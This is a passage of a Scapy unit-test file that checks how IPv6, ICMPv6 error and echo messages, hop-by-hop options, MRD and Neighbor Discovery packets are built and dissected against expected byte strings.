IPV6_ADDR_UNSPECIFIED + += in6_getAddrType - Unassigned Global Unicast address +in6_getAddrType("4000::") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) + += in6_getAddrType - Weird address (FE::1) +in6_getAddrType("FE::") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) + += in6_getAddrType - Weird address (FE8::1) +in6_getAddrType("FE8::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) + += in6_getAddrType - Weird address (1::1) +in6_getAddrType("1::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) + += in6_getAddrType - Weird address (1000::1) +in6_getAddrType("1000::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) + +########### ICMPv6DestUnreach Class ################################# + += ICMPv6DestUnreach Class - Basic Build (no argument) +raw(ICMPv6DestUnreach()) == b'\x01\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6DestUnreach Class - Basic Build over IPv6 (for cksum and overload) +raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach()) == b'`\x00\x00\x00\x00\x08:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x01\x00\x14e\x00\x00\x00\x00' + += ICMPv6DestUnreach Class - Basic Build over IPv6 with some payload +raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach()/IPv6(src="2047::cafe", dst="2048::deca")) == b'`\x00\x00\x00\x000:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x01\x00\x8e\xa3\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@ G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca' + += ICMPv6DestUnreach Class - Dissection with default values and some payload +a = IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach()/IPv6(src="2047::cafe", dst="2048::deca"))) +a.plen == 48 and a.nh == 58 and ICMPv6DestUnreach in a and a[ICMPv6DestUnreach].type == 1 and a[ICMPv6DestUnreach].code == 0 and a[ICMPv6DestUnreach].cksum == 0x8ea3 and a[ICMPv6DestUnreach].unused == 0 and IPerror6 in a + += ICMPv6DestUnreach Class - Dissection with specific values +a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach(code=1, cksum=0x6666, unused=0x7777)/IPv6(src="2047::cafe", dst="2048::deca"))) +a.plen == 48 and a.nh == 58 and ICMPv6DestUnreach in a and a[ICMPv6DestUnreach].type == 1 and a[ICMPv6DestUnreach].cksum == 0x6666 and a[ICMPv6DestUnreach].unused == 0x7777 and IPerror6 in a[ICMPv6DestUnreach] + += ICMPv6DestUnreach Class - checksum computation related stuff +a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach(code=1, cksum=0x6666, unused=0x7777)/IPv6(src="2047::cafe", dst="2048::deca")/TCP())) +b=IPv6(raw(IPv6(src="2047::cafe", dst="2048::deca")/TCP())) +a[ICMPv6DestUnreach][TCPerror].chksum == b.chksum + + +########### ICMPv6PacketTooBig Class ################################ + += ICMPv6PacketTooBig Class - Basic Build (no argument) +raw(ICMPv6PacketTooBig()) == b'\x02\x00\x00\x00\x00\x00\x05\x00' + += ICMPv6PacketTooBig Class - Basic Build over IPv6 (for cksum and overload) +raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig()) == b'`\x00\x00\x00\x00\x08:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x02\x00\x0ee\x00\x00\x05\x00' + += ICMPv6PacketTooBig Class - Basic Build over IPv6 with some payload +raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig()/IPv6(src="2047::cafe", dst="2048::deca")) == b'`\x00\x00\x00\x000:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x02\x00\x88\xa3\x00\x00\x05\x00`\x00\x00\x00\x00\x00;@ G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca' + += ICMPv6PacketTooBig Class - Dissection with default values and some payload +a = IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig()/IPv6(src="2047::cafe", dst="2048::deca"))) +a.plen == 48 and a.nh == 58 and ICMPv6PacketTooBig in a and a[ICMPv6PacketTooBig].type == 2 and a[ICMPv6PacketTooBig].code == 0 and a[ICMPv6PacketTooBig].cksum == 0x88a3 and a[ICMPv6PacketTooBig].mtu == 1280 and IPerror6 in a +True + += ICMPv6PacketTooBig Class - Dissection with specific values +a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig(code=2, cksum=0x6666, mtu=1460)/IPv6(src="2047::cafe", dst="2048::deca"))) +a.plen == 48 and a.nh == 58 and ICMPv6PacketTooBig in a and a[ICMPv6PacketTooBig].type == 2 and a[ICMPv6PacketTooBig].code == 2 and a[ICMPv6PacketTooBig].cksum == 0x6666 and a[ICMPv6PacketTooBig].mtu == 1460 and IPerror6 in a + += ICMPv6PacketTooBig Class - checksum computation related stuff +a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig(code=1, cksum=0x6666, mtu=0x7777)/IPv6(src="2047::cafe", dst="2048::deca")/TCP())) +b=IPv6(raw(IPv6(src="2047::cafe", dst="2048::deca")/TCP())) +a[ICMPv6PacketTooBig][TCPerror].chksum == b.chksum + + +########### ICMPv6TimeExceeded Class ################################ +# To be done but not critical. Same mechanisms and format as +# previous ones. + +########### ICMPv6ParamProblem Class ################################ +# See previous note + +############ +############ ++ Test ICMPv6EchoRequest Class + += ICMPv6EchoRequest - Basic Instantiation +raw(ICMPv6EchoRequest()) == b'\x80\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6EchoRequest - Instantiation with specific values +raw(ICMPv6EchoRequest(code=0xff, cksum=0x1111, id=0x2222, seq=0x3333, data="thisissomestring")) == b'\x80\xff\x11\x11""33thisissomestring' + += ICMPv6EchoRequest - Basic dissection +a=ICMPv6EchoRequest(b'\x80\x00\x00\x00\x00\x00\x00\x00') +a.type == 128 and a.code == 0 and a.cksum == 0 and a.id == 0 and a.seq == 0 and a.data == b"" + += ICMPv6EchoRequest - Dissection with specific values +a=ICMPv6EchoRequest(b'\x80\xff\x11\x11""33thisissomerawing') +a.type == 128 and a.code == 0xff and a.cksum == 0x1111 and a.id == 0x2222 and a.seq == 0x3333 and a.data == b"thisissomerawing" + += ICMPv6EchoRequest - Automatic checksum computation and field overloading (build) +raw(IPv6(dst="2001::cafe", src="2001::deca", hlim=64)/ICMPv6EchoRequest()) == b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x80\x00\x95\xf1\x00\x00\x00\x00' + += ICMPv6EchoRequest - Automatic checksum computation and field overloading (dissection) +a=IPv6(b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x80\x00\x95\xf1\x00\x00\x00\x00') +isinstance(a, IPv6) and a.nh == 58 and isinstance(a.payload, ICMPv6EchoRequest) and a.payload.cksum == 0x95f1 + + +############ +############ ++ Test ICMPv6EchoReply Class + += ICMPv6EchoReply - Basic Instantiation +raw(ICMPv6EchoReply()) == b'\x81\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6EchoReply - Instantiation with specific values +raw(ICMPv6EchoReply(code=0xff, cksum=0x1111, id=0x2222, seq=0x3333, data="thisissomestring")) == b'\x81\xff\x11\x11""33thisissomestring' + += ICMPv6EchoReply - Basic dissection +a=ICMPv6EchoReply(b'\x80\x00\x00\x00\x00\x00\x00\x00') +a.type == 128 and a.code == 0 and a.cksum == 0 and a.id == 0 and a.seq == 0 and a.data == b"" + += ICMPv6EchoReply - Dissection with specific values +a=ICMPv6EchoReply(b'\x80\xff\x11\x11""33thisissomerawing') +a.type == 128 and a.code == 0xff and a.cksum == 0x1111 and a.id == 0x2222 and a.seq == 0x3333 and a.data == b"thisissomerawing" + += ICMPv6EchoReply - Automatic checksum computation and field overloading (build) +raw(IPv6(dst="2001::cafe", src="2001::deca", hlim=64)/ICMPv6EchoReply()) == b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x81\x00\x94\xf1\x00\x00\x00\x00' + += ICMPv6EchoReply - Automatic checksum computation and field overloading (dissection) +a=IPv6(b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x80\x00\x95\xf1\x00\x00\x00\x00') +isinstance(a, IPv6) and a.nh == 58 and isinstance(a.payload, ICMPv6EchoRequest) and a.payload.cksum == 0x95f1 + +########### ICMPv6EchoReply/Request answers() and hashret() ######### + += ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 1 +b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(data="somedata") +a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(data="somedata") +b.hashret() == a.hashret() + +# data are not taken into account for hashret += ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 2 +b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(data="somedata") +a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(data="otherdata") +b.hashret() == a.hashret() + += ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 3 +b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(id=0x6666, seq=0x7777,data="somedata") +a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(id=0x6666, seq=0x8888, data="somedata") +b.hashret() != a.hashret() + += ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 4 +b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(id=0x6666, seq=0x7777,data="somedata") +a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(id=0x8888, seq=0x7777, data="somedata") +b.hashret() != a.hashret() + += ICMPv6EchoRequest and ICMPv6EchoReply - answers() test 5 +b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(data="somedata") +a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(data="somedata") +(a > b) == True + += ICMPv6EchoRequest and ICMPv6EchoReply - answers() test 6 +b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(id=0x6666, seq=0x7777, data="somedata") +a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(id=0x6666, seq=0x7777, data="somedata") +(a > b) == True + += ICMPv6EchoRequest and ICMPv6EchoReply - live answers() use Net6 +~ netaccess ipv6 + +a = IPv6(dst="www.google.com")/ICMPv6EchoRequest() +b = IPv6(src="www.google.com", dst=a.src)/ICMPv6EchoReply() +assert b.answers(a) +assert (a > b) + + +########### ICMPv6MRD* Classes ###################################### + += ICMPv6MRD_Advertisement - Basic instantiation +raw(ICMPv6MRD_Advertisement()) == b'\x97\x14\x00\x00\x00\x00\x00\x00' + += ICMPv6MRD_Advertisement - Instantiation with specific values +raw(ICMPv6MRD_Advertisement(advinter=0xdd, queryint=0xeeee, robustness=0xffff)) == b'\x97\xdd\x00\x00\xee\xee\xff\xff' + += ICMPv6MRD_Advertisement - Basic Dissection and overloading mechanisms +a=Ether(raw(Ether()/IPv6()/ICMPv6MRD_Advertisement())) +a.dst == "33:33:00:00:00:02" and IPv6 in a and a[IPv6].plen == 8 and a[IPv6].nh == 58 and a[IPv6].hlim == 1 and a[IPv6].dst == "ff02::2" and ICMPv6MRD_Advertisement in a and a[ICMPv6MRD_Advertisement].type == 151 and a[ICMPv6MRD_Advertisement].advinter == 20 and a[ICMPv6MRD_Advertisement].queryint == 0 and a[ICMPv6MRD_Advertisement].robustness == 0 + + += ICMPv6MRD_Solicitation - Basic dissection +raw(ICMPv6MRD_Solicitation()) == b'\x98\x00\x00\x00' + += ICMPv6MRD_Solicitation - Instantiation with specific values +raw(ICMPv6MRD_Solicitation(res=0xbb)) == b'\x98\xbb\x00\x00' + += ICMPv6MRD_Solicitation - Basic Dissection and overloading mechanisms +a=Ether(raw(Ether()/IPv6()/ICMPv6MRD_Solicitation())) +a.dst == "33:33:00:00:00:02" and IPv6 in a and a[IPv6].plen == 4 and a[IPv6].nh == 58 and a[IPv6].hlim == 1 and a[IPv6].dst == "ff02::2" and ICMPv6MRD_Solicitation in a and a[ICMPv6MRD_Solicitation].type == 152 and a[ICMPv6MRD_Solicitation].res == 0 + + += ICMPv6MRD_Termination Basic instantiation +raw(ICMPv6MRD_Termination()) == b'\x99\x00\x00\x00' + += ICMPv6MRD_Termination - Instantiation with specific values +raw(ICMPv6MRD_Termination(res=0xbb)) == b'\x99\xbb\x00\x00' + += ICMPv6MRD_Termination - Basic Dissection and overloading mechanisms +a=Ether(raw(Ether()/IPv6()/ICMPv6MRD_Termination())) +a.dst == "33:33:00:00:00:6a" and IPv6 in a and a[IPv6].plen == 4 and a[IPv6].nh == 58 and a[IPv6].hlim == 1 and a[IPv6].dst == "ff02::6a" and ICMPv6MRD_Termination in a and a[ICMPv6MRD_Termination].type == 153 and a[ICMPv6MRD_Termination].res == 0 + + +############ +############ ++ Test HBHOptUnknown Class + += HBHOptUnknown - Basic Instantiation +raw(HBHOptUnknown()) == b'\x01\x00' + += HBHOptUnknown - Basic Dissection +a=HBHOptUnknown(b'\x01\x00') +a.otype == 0x01 and a.optlen == 0 and a.optdata == b"" + += HBHOptUnknown - Automatic optlen computation +raw(HBHOptUnknown(optdata="B"*10)) == b'\x01\nBBBBBBBBBB' + += HBHOptUnknown - Instantiation with specific values +raw(HBHOptUnknown(optlen=9, optdata="B"*10)) == b'\x01\tBBBBBBBBBB' + += HBHOptUnknown - Dissection with specific values +a=HBHOptUnknown(b'\x01\tBBBBBBBBBB') +a.otype == 0x01 and a.optlen == 9 and a.optdata == b"B"*9 and isinstance(a.payload, Raw) and a.payload.load == b"B" + + +############ +############ ++ Test Pad1 Class + += Pad1 - Basic Instantiation +raw(Pad1()) == b'\x00' + += Pad1 - Basic Dissection +raw(Pad1(b'\x00')) == b'\x00' + + +############ +############ ++ Test PadN Class + += PadN - Basic Instantiation +raw(PadN()) == b'\x01\x00' + += PadN - Optlen Automatic computation +raw(PadN(optdata="B"*10)) == b'\x01\nBBBBBBBBBB' + += PadN - Basic Dissection +a=PadN(b'\x01\x00') +a.otype == 1 and a.optlen == 0 and a.optdata == b"" + += PadN - Dissection with specific values +a=PadN(b'\x01\x0cBBBBBBBBBB') +a.otype == 1 and a.optlen == 12 and a.optdata == b'BBBBBBBBBB' + += PadN - Instantiation with forced optlen +raw(PadN(optdata="B"*10, optlen=9)) == b'\x01\x09BBBBBBBBBB' + + +############ +############ ++ Test RouterAlert Class (RFC 2711) + += RouterAlert - Basic Instantiation +raw(RouterAlert()) == b'\x05\x02\x00\x00' + += RouterAlert - Basic Dissection +a=RouterAlert(b'\x05\x02\x00\x00') +a.otype == 0x05 and a.optlen == 2 and a.value == 00 + += RouterAlert - Instantiation with specific values +raw(RouterAlert(optlen=3, value=0xffff)) == b'\x05\x03\xff\xff' + += RouterAlert - Instantiation with specific values +a=RouterAlert(b'\x05\x03\xff\xff') +a.otype == 0x05 and a.optlen == 3 and a.value == 0xffff + + +############ +############ ++ Test Jumbo Class (RFC 2675) + += Jumbo - Basic Instantiation +raw(Jumbo()) == b'\xc2\x04\x00\x00\x00\x00' + += Jumbo - Basic Dissection +a=Jumbo(b'\xc2\x04\x00\x00\x00\x00') +a.otype == 0xC2 and a.optlen == 4 and a.jumboplen == 0 + += Jumbo - Instantiation with specific values +raw(Jumbo(optlen=6, jumboplen=0xffffffff)) == b'\xc2\x06\xff\xff\xff\xff' + += Jumbo - Dissection with specific values +a=Jumbo(b'\xc2\x06\xff\xff\xff\xff') +a.otype == 0xc2 and a.optlen == 6 and a.jumboplen == 0xffffffff + + +############ +############ ++ Test HAO Class (RFC 3775) + += HAO - Basic Instantiation +raw(HAO()) == b'\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += HAO - Basic Dissection +a=HAO(b'\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.otype == 0xC9 and a.optlen == 16 and a.hoa == "::" + += HAO - Instantiation with specific values +raw(HAO(optlen=9, hoa="2001::ffff")) == b'\xc9\t \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff' + += HAO - Dissection with specific values +a=HAO(b'\xc9\t \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff') +a.otype == 0xC9 and a.optlen == 9 and a.hoa == "2001::ffff" + += HAO - hashret + +p = IPv6()/IPv6ExtHdrDestOpt(options=HAO(hoa="2001:db8::1"))/ICMPv6EchoRequest() +p.hashret() == b' \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x00\x00\x00\x00' + + +############ +############ ++ Test IPv6ExtHdrHopByHop() + += IPv6ExtHdrHopByHop - Basic Instantiation +raw(IPv6ExtHdrHopByHop()) == b';\x00\x01\x04\x00\x00\x00\x00' + += IPv6ExtHdrHopByHop - Instantiation with HAO option +raw(IPv6ExtHdrHopByHop(options=[HAO()])) == b';\x02\x01\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += IPv6ExtHdrHopByHop - Instantiation with RouterAlert option +raw(IPv6ExtHdrHopByHop(options=[RouterAlert()])) == b';\x00\x05\x02\x00\x00\x01\x00' + += IPv6ExtHdrHopByHop - Instantiation with Jumbo option +raw(IPv6ExtHdrHopByHop(options=[Jumbo()])) == b';\x00\xc2\x04\x00\x00\x00\x00' + += IPv6ExtHdrHopByHop - Complete dissection with Jumbo option +s = b'`\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x00\xc2\x04\x00\x00\x00\x10\x80\x00\x7f\xbb\x00\x00\x00\x00' +p = IPv6(s) +assert IPv6ExtHdrHopByHop in p and Jumbo in p and ICMPv6EchoRequest in p + +s = b'`\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x01\x01\x06\x00\x00\x00\x00\x00\x00\xc2\x04\x00\x00\x00\x18\x80\x00\x7f\xbb\x00\x00\x00\x00' +p = IPv6(s) +assert IPv6ExtHdrHopByHop in p and PadN in p and Jumbo in p and ICMPv6EchoRequest in p + += IPv6ExtHdrHopByHop - Instantiation with Pad1 option +raw(IPv6ExtHdrHopByHop(options=[Pad1()])) == b';\x00\x00\x01\x03\x00\x00\x00' + += IPv6ExtHdrHopByHop - Instantiation with PadN option +raw(IPv6ExtHdrHopByHop(options=[Pad1()])) == b';\x00\x00\x01\x03\x00\x00\x00' + += IPv6ExtHdrHopByHop - Instantiation with Jumbo, RouterAlert, HAO +raw(IPv6ExtHdrHopByHop(options=[Jumbo(), RouterAlert(), HAO()])) == b';\x03\xc2\x04\x00\x00\x00\x00\x05\x02\x00\x00\x01\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += IPv6ExtHdrHopByHop - Instantiation with HAO, Jumbo, RouterAlert +raw(IPv6ExtHdrHopByHop(options=[HAO(), Jumbo(), RouterAlert()])) == b';\x04\x01\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\xc2\x04\x00\x00\x00\x00\x05\x02\x00\x00\x01\x02\x00\x00' + += IPv6ExtHdrHopByHop - Instantiation with RouterAlert, HAO, Jumbo +raw(IPv6ExtHdrHopByHop(options=[RouterAlert(), HAO(), Jumbo()])) == b';\x03\x05\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\xc2\x04\x00\x00\x00\x00' + += IPv6ExtHdrHopByHop - Hashret +(IPv6(src="::1", dst="::1")/IPv6ExtHdrHopByHop()).hashret() == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;' + += IPv6ExtHdrHopByHop - Basic Dissection +a=IPv6ExtHdrHopByHop(b';\x00\x01\x04\x00\x00\x00\x00') +a.nh == 59 and a.len == 0 and len(a.options) == 1 and isinstance(a.options[0], PadN) and a.options[0].otype == 1 and a.options[0].optlen == 4 and a.options[0].optdata == b'\x00'*4 + +#= IPv6ExtHdrHopByHop - Automatic length computation +#raw(IPv6ExtHdrHopByHop(options=["toto"])) == b'\x00\x00toto' +#= IPv6ExtHdrHopByHop - Automatic length computation +#raw(IPv6ExtHdrHopByHop(options=["toto"])) == b'\x00\x00tototo' + + +############ +############ ++ Test ICMPv6ND_RS() class - ICMPv6 Type 133 Code 0 + += ICMPv6ND_RS - Basic instantiation +raw(ICMPv6ND_RS()) == b'\x85\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6ND_RS - Basic instantiation with empty dst in IPv6 underlayer +raw(IPv6(src="2001:db8::1")/ICMPv6ND_RS()) == b'`\x00\x00\x00\x00\x08:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x85\x00M\xfe\x00\x00\x00\x00' + += ICMPv6ND_RS - Basic dissection +a=ICMPv6ND_RS(b'\x85\x00\x00\x00\x00\x00\x00\x00') +a.type == 133 and a.code == 0 and a.cksum == 0 and a.res == 0 + += ICMPv6ND_RS - Basic instantiation with empty dst in IPv6 underlayer +a=IPv6(b'`\x00\x00\x00\x00\x08:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x85\x00M\xfe\x00\x00\x00\x00') +assert isinstance(a, IPv6) and a.nh == 58 and a.hlim == 255 and isinstance(a.payload, ICMPv6ND_RS) and a.payload.type == 133 and a.payload.code == 0 and a.payload.cksum == 0x4dfe and a.payload.res == 0 +assert a.hashret() == b":" + + +############ +############ ++ Test ICMPv6ND_RA() class - ICMPv6 Type 134 Code 0 + += ICMPv6ND_RA - Basic Instantiation +raw(ICMPv6ND_RA()) == b'\x86\x00\x00\x00\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6ND_RA - Basic instantiation with empty dst in IPv6 underlayer +raw(IPv6(src="2001:db8::1")/ICMPv6ND_RA()) == b'`\x00\x00\x00\x00\x10:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00E\xe7\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6ND_RA - Basic dissection +a=ICMPv6ND_RA(b'\x86\x00\x00\x00\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 134 and a.code == 0 and a.cksum == 0 and a.chlim == 0 and a.M == 0 and a.O == 0 and a.H == 0 and a.prf == 1 and a.res == 0 and a.routerlifetime == 1800 and a.reachabletime == 0 and a.retranstimer == 0 + += ICMPv6ND_RA - Basic instantiation with empty dst in IPv6 underlayer +a=IPv6(b'`\x00\x00\x00\x00\x10:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00E\xe7\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') +isinstance(a, IPv6) and a.nh == 58 and a.hlim == 255 and isinstance(a.payload, ICMPv6ND_RA) and a.payload.type == 134 and a.code == 0 and a.cksum == 0x45e7 and a.chlim == 0 and a.M == 0 and a.O == 0 and a.H == 0 and a.prf == 1 and a.res == 0 and a.routerlifetime == 1800 and a.reachabletime == 0 and a.retranstimer == 0 + += ICMPv6ND_RA - Answers +assert ICMPv6ND_RA().answers(ICMPv6ND_RS()) +a=IPv6(b'`\x00\x00\x00\x00\x10:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00E\xe7\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') +b = IPv6(b"`\x00\x00\x00\x00\x10:\xff\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x85\x00M\xff\x00\x00\x00\x00") +assert a.answers(b) + += ICMPv6ND_RA - Summary Output +ICMPv6ND_RA(chlim=42, M=0, O=1, H=0, prf=1, P=0, routerlifetime=300).mysummary() == "ICMPv6 Neighbor Discovery - Router Advertisement Lifetime 300 Hop Limit 42 Preference High Managed 0 Other 1 Home 0" + +############ +############ ++ ICMPv6ND_NS Class Test + += ICMPv6ND_NS - Basic Instantiation +raw(ICMPv6ND_NS()) == b'\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6ND_NS - Instantiation with specific values +raw(ICMPv6ND_NS(code=0x11, res=3758096385, tgt="ffff::1111")) == b'\x87\x11\x00\x00\xe0\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6ND_NS - Basic Dissection +a=ICMPv6ND_NS(b'\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.code==0 and a.res==0 and a.tgt=="::" + += ICMPv6ND_NS - Dissection with specific values +a=ICMPv6ND_NS(b'\x87\x11\x00\x00\xe0\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +assert a.code==0x11 and a.res==3758096385 and a.tgt=="ffff::1111" +assert a.hashret() == b"ffff::1111" + += ICMPv6ND_NS - IPv6 layer fields overloading +a=IPv6(raw(IPv6()/ICMPv6ND_NS())) +a.nh == 58 and a.dst=="ff02::1" and a.hlim==255 + +############ +############ ++ ICMPv6ND_NA Class Test + += ICMPv6ND_NA - Basic Instantiation +raw(ICMPv6ND_NA()) == b'\x88\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6ND_NA - Instantiation with specific values +raw(ICMPv6ND_NA(code=0x11, R=0, S=1, O=0, res=1, tgt="ffff::1111")) == b'\x88\x11\x00\x00@\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6ND_NA - Basic Dissection +a=ICMPv6ND_NA(b'\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.code==0 and a.R==0 and a.S==0 and a.O==0 and a.res==0 and a.tgt=="::" + += ICMPv6ND_NA - Dissection with specific values +a=ICMPv6ND_NA(b'\x88\x11\x00\x00@\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +a.code==0x11 and a.R==0 and a.S==1 and a.O==0 and a.res==1 and a.tgt=="ffff::1111" +assert a.hashret() == b'ffff::1111' + += ICMPv6ND_NS - IPv6 layer fields overloading +a=IPv6(raw(IPv6()/ICMPv6ND_NS())) +a.nh == 58 and a.dst=="ff02::1" and a.hlim==255 + + +############ +############ ++ ICMPv6ND_ND/ICMPv6ND_ND matching test + += ICMPv6ND_ND/ICMPv6ND_ND matching - test 1 +# Sent NS 